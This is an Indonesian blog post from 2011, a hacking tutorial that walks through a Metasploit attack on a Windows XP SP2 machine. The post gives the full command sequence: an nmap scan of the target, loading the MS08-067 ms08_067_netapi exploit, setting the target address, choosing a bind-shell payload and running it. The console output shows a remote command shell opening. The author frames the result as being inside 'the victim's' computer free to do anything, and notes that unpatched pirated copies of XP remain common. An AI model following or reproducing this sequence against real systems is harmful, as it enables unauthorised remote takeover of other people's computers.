Sunday, January 9, 2011

Hacking With Basicly Command Metasploit


Pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445, sekarang mungkin udah di pacth deh, tapi masih banyak keknya yang make XP2 bajakan.
jalankan metasploit nya mau di windows ama di linux keknya sama aja deh , Saya nyobanya di ubuntu 9.04 ni.

Blackmygo@ubuntu:~msfconsole
|\/| |¯ ¯|¯ /¯\ |¯  |¯| |  |¯| | ¯|¯ 
|  | |¯  |  |¯|  ¯| |¯  |_ |_| |  |  
      ¯          ¯                 
        =[ msf  v3.3 dev
        =[ 359 exploits - 233 payloads
        =[ 20 encoders 7 nops
        =[ 132 aux
msf > version
Framework : 3.3 dev.6055
Console     : 3.3 dev.6344
msf >

oke awalya ketik in aja help untuk ngeliat bantuan yang ada

msf > help

      Core Commands
      =============

      Command       Description
      -------       -----------
      ?             Help menu
      back          Move back from the current context
      banner        Display an awesome metasploit banner
      cd            Change the current working directory
      connect       Communicate with a host
      exit          Exit the console
      help          Help menu
      info          Displays information about one or more module
      irb           Drop into irb scripting mode
      jobs          Displays and manages jobs
      load          Load a framework plugin
      loadpath      Searches for and loads modules from a path
      quit          Exit the console
      resource      Run the commands stored in a file
      route         Route traffic through a session
      save          Saves the active datastores
      search        Searches module names and descriptions
      sessions      Dump session listings and display information about sessions
      set           Sets a variable to a value
      setg          Sets a global variable to a value
      show          Displays modules of a given type, or all modules
      sleep         Do nothing for the specified number of seconds
      unload        Unload a framework plugin
      unset         Unsets one or more variables
      unsetg        Unsets one or more global variables
      use           Selects a module by name
      version       Show the framework and console library version numbers

Untuk melihat list exploits-nya , gunakan perintah :

msf > show exploits

kira-kira yang keluar seperti inilah, panjang banget soalnya :

windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg      Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras             Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi           Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi            Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks            Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi           Microsoft Server Service Relative Path Stac

nah kemudian kita harus scan dulu ntu komputer yang mau kita attach
dengan IP 192.168.1.2 kita pake nmap biar lengkap.

msf > sudo nmap -v -sS -A -O 192.168.1.2

Selanjutnya hasilnya keluar seperti ini :

[*] exec: sudo nmap -v -sS -A -O 192.168.1.2
[sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-31 23:50 CIT
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.2 [1 port]
Host 192.168.1.2 appears to be up ... good.
Interesting ports on 192.168.1.2:
Not shown: 1712 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan show options :

msf exploit(ms08_067_netapi) > show options

Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  

Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

msf exploit(ms08_067_netapi) > set rhost 192.168.1.2
rhost => 192.168.1.2

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :

msf exploit(ms08_067_netapi) > show targets

Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :

msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================
   Name                                            Description
   ----                                            -----------
   generic/debug_trap                Generic x86 Debug Trap
   generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
   generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
   generic/debug_trap/bind_tcp       Generic x86 Debug Trap, Bind TCP Stager

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :

msf exploit(ms08_067_netapi) > show options

Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.2      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  

Payload options (windows/shell_bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.1.2      no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

sekarang jalankan exploit :

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.2:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.2
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254

C:\WINDOWS\system32>

sekarang kita udah berada di komputer si korban silahkan lakukan yang anda mau.

Sekian dulu dari saya semoga bermanfaat.

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Radio Online